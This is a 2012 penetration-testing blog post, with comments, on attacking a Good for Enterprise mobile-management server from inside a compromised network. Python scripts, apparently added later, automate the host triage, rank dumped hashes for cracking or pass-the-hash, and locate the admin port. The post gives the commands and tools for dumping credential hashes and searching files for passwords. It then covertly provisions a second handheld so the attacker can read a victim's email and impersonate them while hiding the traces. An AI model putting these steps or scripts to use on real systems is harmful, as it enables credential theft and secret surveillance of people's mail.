Tuesday, April 17, 2012

Hack Tips: Good for Enterprise Exploitation

By Tony Lee.

Good’s website best describes their excellent product capabilities:

“Good for Enterprise™ is a suite of powerful mobile device management tools that bring military-grade security, end-to-end data loss prevention, and collaboration features to today's most popular smartphones and tablets — without compromising IT security and control.”
Source: http://www.good.com/products/good-for-enterprise.php

What we are discussing here is not a 0-day against Good for Enterprise; it is a methodology for inspecting the security of a Good for Enterprise deployment once an attacker already has a foothold on the network.


Overall, the process involves the following steps:

  1. Identifying the Good for Enterprise server
  2. Identifying the Good administrator accounts
  3. Obtaining Good administrator credentials
  4. Accessing the management interface (Good Mobile Control)
  5. Provisioning a handheld and reading someone else's email (Note: we are not lawyers--this might be a bad idea)

Identifying "Good for Enterprise" Servers

How to determine whether the host you have landed on is a Good for Enterprise server (we found ours by its DNS name and confirmed it with the following):

  1. Host naming scheme examples
    • \\GOOD
    • \\GOODMAIL
  2. Application directory
    • C:\Program Files (x86)\Good Technology\
  3. User accounts - There are no fixed account names for the service, but the documentation uses "GoodAdmin", so likely names include:
    • Goodgmc
    • GoodAdmin
  4. Services - net start should contain:
    • Good Mobile Control server
    • GoodLink Server

Identifying "Good for Enterprise" Administrators

Try to determine who the Good administrators are (we found a Good-related file and viewed its properties to see who had rights on it):

  1. Check for user accounts -
    • Net commands - net user
    • Check "Users" directory - C:\>dir c:\users
      Volume in drive C is OS
      Volume Serial Number is

      Directory of c:\users

      11/10/2011 08:10 AM <DIR> .
      11/10/2011 08:10 AM <DIR> ..
      12/02/2010 09:02 AM <DIR> <username>
      09/01/2011 10:08 AM <DIR> <username>
      07/13/2009 11:57 PM <DIR> Public
      05/19/2011 01:43 PM <DIR> Administrator
      11/07/2011 03:26 PM <DIR> Goodadmin
      09/21/2011 04:02 AM <DIR> GoodGMC
      0 File(s) 0 bytes
      8 Dir(s) 23,495,675,904 bytes free

  2. File permissions of Application Files
    • Right click file -> Properties -> Security Tab (or run icacls <file> from the command line to get the same ACL as text)
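The following Python script is an added example, not code from the original post or from Good Technology. It automates the server and administrator checks from the two sections above: it parses the text printed by net start, dir c:\users and icacls <file> (the command-line equivalent of the Properties -> Security tab), reports which of the post's indicators matched, and lists the non-built-in principals with Full or Modify rights on a Good file. The sample outputs, the CORP domain, the user names and the file path are constructed for the example; the US-locale dir date format and the 32-bit install path are assumptions.

```python
"""Triage a Windows host for the Good for Enterprise indicators in the post.
Added example, not code from the post or from Good Technology. The parsers
take the text printed by `net start`, `dir c:\\users` and `icacls <file>`, so
they run offline on captured output; collect_live() runs the commands on a
Windows host. Assumptions: US-locale `dir` dates; the "good*" account-name
pattern and the 32-bit install path are guesses, not a documented scheme.
"""
import os
import platform
import re
import subprocess

GOOD_SERVICES = {"good mobile control server", "goodlink server"}  # from the post
GOOD_INSTALL_DIRS = [r"C:\Program Files (x86)\Good Technology",    # from the post
                     r"C:\Program Files\Good Technology"]          # assumption: 32-bit host
GOOD_NAME_RE = re.compile(r"good", re.IGNORECASE)
BUILTIN_PREFIXES = ("BUILTIN\\", "NT AUTHORITY\\", "NT SERVICE\\", "CREATOR OWNER")
DIR_ENTRY_RE = re.compile(r"^\s*\d\d/\d\d/\d{4}\s+\d\d:\d\d\s+[AP]M\s+<DIR>\s+(.+?)\s*$")
# icacls prints "<path> <identity>:(perms)..." first, then indented "<identity>:(perms)..." lines
ICACLS_ACE_RE = re.compile(r"^(.*?):((?:\([^)]*\))+)\s*$")


def parse_net_start(text):
    """Running service names from `net start` (the indented lines), lower-cased."""
    return {l.strip().lower() for l in text.splitlines() if l.startswith(" ") and l.strip()}


def parse_dir_users(text):
    """Profile directory names from `dir c:\\users`, without '.' and '..'."""
    names = [m.group(1) for m in map(DIR_ENTRY_RE.match, text.splitlines()) if m]
    return [n for n in names if n not in (".", "..")]


def parse_icacls(text, path=None):
    """(identity, perms) pairs from `icacls <path>`; the path prefix is removed from the first ACE."""
    aces = []
    for line in text.splitlines():
        m = ICACLS_ACE_RE.match(line)
        if not m:
            continue
        who = m.group(1).strip()
        if path and who.lower().startswith(path.lower()):
            who = who[len(path):].strip()
        aces.append((who, m.group(2)))
    return aces


def candidate_admins(aces):
    """Non-built-in principals with Full (F) or Modify (M) rights on the file."""
    return [who for who, perms in aces
            if not who.upper().startswith(BUILTIN_PREFIXES) and ("(F)" in perms or "(M)" in perms)]


def good_indicators(hostname, services, profiles, install_dirs_present):
    """The post's four indicators (host name, services, profiles, install dir) that matched."""
    hits = ["hostname: " + hostname] if GOOD_NAME_RE.search(hostname) else []
    hits += ["service: " + s for s in sorted(services & GOOD_SERVICES)]
    hits += ["profile: " + p for p in profiles if GOOD_NAME_RE.match(p)]
    hits += ["install dir: " + d for d in install_dirs_present]
    return hits


def collect_live():
    """Run the commands on this Windows host and return the matched indicators."""
    if platform.system() != "Windows":
        raise RuntimeError("live collection only works on Windows")
    run = lambda *cmd: subprocess.run(cmd, capture_output=True, text=True).stdout
    services = parse_net_start(run("net", "start"))
    profiles = parse_dir_users(run("cmd", "/c", "dir", r"c:\users"))
    return good_indicators(platform.node(), services, profiles,
                           [d for d in GOOD_INSTALL_DIRS if os.path.isdir(d)])


# Constructed sample output (domain, user names and file path are made up).
SAMPLE_NET_START = """These Windows services are started:

   DNS Client
   Good Mobile Control server
   GoodLink Server
The command completed successfully.
"""
SAMPLE_DIR_USERS = r""" Directory of c:\users
11/10/2011  08:10 AM    <DIR>          .
11/10/2011  08:10 AM    <DIR>          ..
12/02/2010  09:02 AM    <DIR>          jsmith
07/13/2009  11:57 PM    <DIR>          Public
05/19/2011  01:43 PM    <DIR>          Administrator
11/07/2011  03:26 PM    <DIR>          Goodadmin
09/21/2011  04:02 AM    <DIR>          GoodGMC
               0 File(s)              0 bytes
"""
SAMPLE_ICACLS_PATH = r"C:\Program Files (x86)\Good Technology\GMC\server.conf"
SAMPLE_ICACLS = SAMPLE_ICACLS_PATH + r""" CORP\GoodGMC:(F)
             NT AUTHORITY\SYSTEM:(I)(F)
             BUILTIN\Administrators:(I)(F)
             CORP\GoodAdmin:(I)(M)
             BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

if __name__ == "__main__":
    hits = good_indicators("GOODMAIL", parse_net_start(SAMPLE_NET_START), parse_dir_users(SAMPLE_DIR_USERS), [])
    print("\n".join(hits))
    print("rights on the Good file:", candidate_admins(parse_icacls(SAMPLE_ICACLS, SAMPLE_ICACLS_PATH)))
```

Run it as-is to see the triage on the constructed sample, or call collect_live() on the suspect host; the ACL step is the one that actually names the administrator, the other three only tell you that you are on the right box.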

Identifying "Good for Enterprise" Account Credentials

We used Windows Credentials Editor to grab hashes from memory for a Good administrator and cracked them.

  1. With the Good administrator account identified, dump password hashes with:
    • hashdump
    • gsecdump
    • fgdump
    • Other favorites
  2. Find files that may contain credentials
    • findstr /I /S /M pass c:\*
    • dir /a /s /b c:\*pass*
  3. Windows Credentials Editor (WCE) to grab the hashes of logged-on domain accounts from memory:
    • C:\> wce.exe
      WCE v1.2 (X64) (Windows Credentials Editor) - (c) 2010,2011 Amplia Security – by Hernan Ochoa (hernan@ampliasecurity.com)
      Use -h for help.

      User: Domain:00000000000000000000000000000000:B9BLAHBLAHBLAHBLAHBLAHBLAHBAC
      GoodGMC: Domain:00000000000000000000000000000000:7D3BLAHBLAHBLAHBLAHBLAHBLAHFA3
      BINGO! WCE prints one line per logged-on account as User:Domain:LMhash:NThash, so the all-zero field is an empty LM hash and the value after it is the NT hash for GoodGMC (the account that has rights on the Good file). Crack the NT hash offline, or skip cracking and replay it (pass-the-hash).
      There is also an account called GoodAdmin; if its hash is in memory, replaying it would be another possibility.
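As an added example (not from the post and not part of WCE), the Python helper below parses WCE's User:Domain:LMhash:NThash lines and tags each credential: whether the LM field is empty (WCE prints all zeros, or the LM hash of the empty string, when no LM hash is stored), whether the password is blank, whether it is a machine account (name ends in $), and whether the name looks Good-related. It then orders the list so the Good-related user accounts come first and emits pwdump-style lines for John the Ripper. The sample output, the CORP domain and the account names are constructed; the first NT hash is the well-known hash of "password", the svc_legacy line carries the LM hash of "password", and the other hashes are arbitrary hex.

```python
"""Triage Windows Credentials Editor (wce.exe) output.
Added example, not from the post and not part of WCE. WCE prints one
logged-on account per line as User:Domain:LMhash:NThash (32 hex chars each).
The sample is constructed: the CORP domain and names are made up, the first
NT hash is the well-known hash of "password", the rest are arbitrary hex.
"""
import re

WCE_LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<domain>[^:]*):(?P<lm>[0-9A-Fa-f]{32}):(?P<nt>[0-9A-Fa-f]{32})\s*$")
# "no LM hash stored": WCE's all-zero placeholder, or the LM hash of the empty string
EMPTY_LM = {"00000000000000000000000000000000", "aad3b435b51404eeaad3b435b51404ee"}
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty string
GOOD_NAME_RE = re.compile(r"good", re.IGNORECASE)


def parse_wce(text):
    """{user, domain, lm, nt} per credential line, hashes lower-cased; the banner is skipped."""
    creds = []
    for line in text.splitlines():
        m = WCE_LINE_RE.match(line.strip())
        if m:
            c = m.groupdict()
            c["lm"], c["nt"] = c["lm"].lower(), c["nt"].lower()
            creds.append(c)
    return creds


def triage(cred):
    """Flags that decide what to do with one credential."""
    return {
        "machine_account": cred["user"].endswith("$"),  # long random password: replay only, never crack
        "lm_present": cred["lm"] not in EMPTY_LM,       # weak DES-based hash: crack this one first
        "blank_password": cred["nt"] == EMPTY_NT,
        "good_related": bool(GOOD_NAME_RE.search(cred["user"])),
        "pth_candidate": cred["nt"] != EMPTY_NT,        # NT hash can be replayed without cracking
    }


def prioritize(creds):
    """Good-related user accounts first, other users next, machine accounts last."""
    def key(c):
        f = triage(c)
        return (f["machine_account"], not f["good_related"], c["user"].lower())
    return sorted(creds, key=key)


def to_pwdump(cred):
    """pwdump-style line (user:rid:LM:NT:::) for john --format=NT; the RID is unknown and written as 0."""
    return f"{cred['user']}:0:{cred['lm']}:{cred['nt']}:::"


# Constructed sample; the real tool prints the same fields without the spaces the post shows.
SAMPLE_WCE = """WCE v1.2 (X64) (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

jsmith:CORP:00000000000000000000000000000000:8846F7EAEE8FB117AD06BDD830B7586C
GoodGMC:CORP:00000000000000000000000000000000:7D3A9C0B1E2F4D5C6B7A8F9E0D1C2BA3
svc_legacy:CORP:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C
GOODMAIL$:CORP:00000000000000000000000000000000:0C5A1A2B3C4D5E6F7081928374655647
tmpuser:CORP:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
"""

if __name__ == "__main__":
    for c in prioritize(parse_wce(SAMPLE_WCE)):
        flags = [k for k, v in triage(c).items() if v]
        print(f"{c['domain']}\\{c['user']:<12} {', '.join(flags)}")
        print("   ", to_pwdump(c))
```

The distinction the flags draw is the one that matters in the field: an LM hash is worth cracking immediately, an NT hash for a user account can be cracked or simply replayed, and a machine-account hash is only ever replayed.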

Accessing The Management Interface (Good Mobile Control)

To check whether the management web interface is listening:

Via the command line:
C:\ >netstat -ano | findstr 8443
TCP [::]:8443 [::]:0 LISTENING 3804

Via the Browser:
  • http://<GoodServer> redirects to the secure login on port 8443 at the URL below
  • https://<GoodServer>:8443/login.do
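As an added example (not from the post), this Python script does the netstat check above programmatically: it parses netstat -ano for sockets bound to 8443 (both the 0.0.0.0 and the bracketed IPv6 form), drops established client sessions so only the listener remains, resolves the PID to a process name with tasklist /fo csv, and builds the login URL to try. The sample netstat and tasklist output is constructed, and the process image name in it is made up.

```python
"""Locate the Good Mobile Control listener from `netstat -ano` output.
Added example, not from the post. find_listeners() parses netstat -ano lines for
a port (IPv4 and bracketed IPv6 local addresses, TCP and UDP), parse_tasklist_csv()
maps the PID to a process name from `tasklist /fo csv`, and collect_live() runs both
commands on a Windows host. The sample outputs are constructed and the process
image name in them is made up.
"""
import csv
import io
import platform
import re
import subprocess

GMC_PORT = 8443  # from the post
# "  TCP    [::]:8443   [::]:0   LISTENING   3804" / "  UDP   0.0.0.0:123   *:*   1052" (no state)
NETSTAT_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(?:([A-Z_]+)\s+)?(\d+)\s*$")


def find_listeners(netstat_text, port=GMC_PORT):
    """Sockets bound to `port`: TCP ones only in LISTENING state, UDP ones as-is."""
    hits = []
    for line in netstat_text.splitlines():
        m = NETSTAT_RE.match(line)
        if not m:
            continue
        proto, local, _remote, state, pid = m.groups()
        ip, _, lport = local.rpartition(":")       # rpartition keeps IPv6 colons intact
        if not lport.isdigit() or int(lport) != port:
            continue
        if proto == "TCP" and state != "LISTENING":
            continue
        hits.append({"proto": proto, "ip": ip.strip("[]"), "pid": int(pid)})
    return hits


def parse_tasklist_csv(text):
    """{pid: image name} from `tasklist /fo csv` output."""
    return {int(row["PID"]): row["Image Name"] for row in csv.DictReader(io.StringIO(text))}


def login_url(host, port=GMC_PORT):
    """Where http://<host> redirects to, per the post."""
    return f"https://{host}:{port}/login.do"


def gmc_report(netstat_text, tasklist_text, host, port=GMC_PORT):
    """One line per socket on the GMC port: owning process and the URL to try."""
    procs = parse_tasklist_csv(tasklist_text)
    return [f"{l['proto']} {l['ip']}:{port} pid={l['pid']} ({procs.get(l['pid'], '?')}) -> {login_url(host, port)}"
            for l in find_listeners(netstat_text, port)]


def collect_live(host="localhost"):
    """Run netstat/tasklist on this Windows host and return gmc_report()."""
    if platform.system() != "Windows":
        raise RuntimeError("live collection only works on Windows")
    run = lambda *cmd: subprocess.run(cmd, capture_output=True, text=True).stdout
    return gmc_report(run("netstat", "-ano"), run("tasklist", "/fo", "csv"), host)


# Constructed sample output; "webserver.exe" is a made-up image name.
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       748
  TCP    10.0.0.5:8443          10.0.0.77:51022        ESTABLISHED     3804
  TCP    [::]:8443              [::]:0                 LISTENING       3804
  UDP    0.0.0.0:123            *:*                                    1052
"""
SAMPLE_TASKLIST = '''"Image Name","PID","Session Name","Session#","Mem Usage"
"svchost.exe","748","Services","0","12,345 K"
"webserver.exe","3804","Services","0","456,789 K"
'''

if __name__ == "__main__":
    print("\n".join(gmc_report(SAMPLE_NETSTAT, SAMPLE_TASKLIST, "goodmail")))
```

The ESTABLISHED line in the sample is what a connected admin session looks like from the server side; it shares the local port with the listener, which is why the state filter is needed before trusting the PID.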

Sample of the Good Mobile Control Interface - Source: http://www.c-cure.dk/Images/Producenter/Good/GoodMobileControl.PNG

Covertly Reading Emails

Once logged into the Good Mobile Control interface, you have full power to lock, remotely wipe, and configure new handhelds.

You cannot generate a new Over-The-Air (OTA) provisioning PIN for a handheld that is already set up; attempting it produces the following error:

“This email address has already been set up on another handheld. Contact your IT administrator” I hate those error messages, especially when we are the IT administrator. Doh!

However, you can add a second handheld to an existing user and read their email from it.

Reading email without the user's knowledge

Check the policy that you are about to create the handheld under to ensure that a welcome email does not get sent to the user:

Log into Good Mobile Control web interface -> Policies tab -> Provisioning link -> Welcome Email and verify that “Send welcome email after OTA Provisioning PIN is created” is unchecked.

If it is checked, create a copy of the policy and uncheck that welcome email setting:

Log into Good Mobile Control web interface -> Policies tab -> Check the policy you want to copy and click the button that says “Make Copy”. Now, click on the policy hyperlink -> Provisioning link -> Welcome Email and verify that “Send welcome email after OTA Provisioning PIN is created” is unchecked.

Provisioning a new handheld to read user email

  1. Handhelds tab -> “Add Handhelds” button -> Search for a User -> Click “Look Now” -> Select the Policy and Messaging server then Click “Add”
  2. Under the Handhelds tab you will now have a blank entry with just the user's name. Click the hyperlink for that person.
  3. Click the OTA link on the left; the OTA PIN displayed is valid.
  4. Download the Good application from the app store, then enter the victim's email address and the OTA PIN displayed on the Good Mobile Control page.
  5. Read and “mark as unread” to your heart’s content. You can even send emails as this person, however be sure to delete the email from the sent folder—you may want to have them reply to you on your “personal” email address at victimsname@gmail.com for further correspondence :0 ;)

Are you sure you are the only one reading your email?


  1. This Attack Vector looks like it is more geared to a sneaky insider on a lower class Network where the admins are not making use of some basic mitigation techniques or a network where the sysadmin may have unintentionally exposed their GMC to the external internet by allowing forward of port 8443 out through the firewall.

  2. Thanks for the feedback. Insider threats are definitely a possibility, but don’t forget about what happens after a network is compromised. The purpose of the hack tips series is to go beyond the hack to obtain domain admin or enterprise admin. Getting EA or DA does not always properly convey the impact to management as it may be missing that "so what" factor. Furthermore, good adversaries will leverage their access to attack other critical components such as the network infrastructure, mobile platforms, etc.--so we shouldn't forget about them just because they are behind the perimeter firewall. Happy Hacking.

  3. This is not a "hack". I can hack any server and application that I have permissions to - this is a joke.

    1. I'm sorry that you feel that it is not a hack. The challenge was to go from a compromised host (not necessarily the Good Server) to provisioning a phone without anyone noticing. Thus, we never had permission to log into the server or the application; we had to gain that.

      As an example, imagine an attacker breaks into your network (remote exploit, web, phish, whatever) and wants to provision a phone as the CEO without anyone noticing... This is one possibility on how it might be accomplished. Wdigest saves you the time of cracking the password though. :)